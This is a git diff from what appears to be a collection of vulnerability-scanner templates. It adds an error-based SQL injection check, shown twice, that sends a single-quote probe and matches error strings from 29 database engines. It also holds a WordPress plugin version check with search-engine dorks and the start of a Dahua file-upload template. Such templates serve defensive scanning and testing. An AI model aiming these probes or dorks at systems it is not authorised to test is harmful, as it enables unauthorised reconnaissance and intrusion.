https://www.wordfence.com/threat-intel/vulnerabilities/id/cdb9c321-1a2c-4593-9947-2071a908ee1c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woocommerce-multiple-free-gift/" + google-query: inurl:"/wp-content/plugins/woocommerce-multiple-free-gift/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woocommerce-multiple-free-gift,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-multiple-free-gift/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-multiple-free-gift" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.3') \ No newline at end of file diff --git a/poc/sql/mass-sqli.yaml b/poc/sql/mass-sqli.yaml new file mode 100644 index 0000000000..d41cf43580 --- /dev/null +++ b/poc/sql/mass-sqli.yaml @@ -0,0 +1,476 @@ +id: error-based-sql-injection + +info: + name: Error based SQL injection + author: geeknik + severity: high + description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. + tags: sqli,generic,error + +requests: + - method: GET + path: + - "{{BaseURL}}/'" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" diff --git a/poc/sql_injection/mass-sqli.yaml b/poc/sql_injection/mass-sqli.yaml new file mode 100644 index 0000000000..d41cf43580 --- /dev/null +++ b/poc/sql_injection/mass-sqli.yaml @@ -0,0 +1,476 @@ +id: error-based-sql-injection + +info: + name: Error based SQL injection + author: geeknik + severity: high + description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. + tags: sqli,generic,error + +requests: + - method: GET + path: + - "{{BaseURL}}/'" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 78d89c1465..1af31ba824 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml @@ -1,29 +1,43 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions metadata: fofa-query: 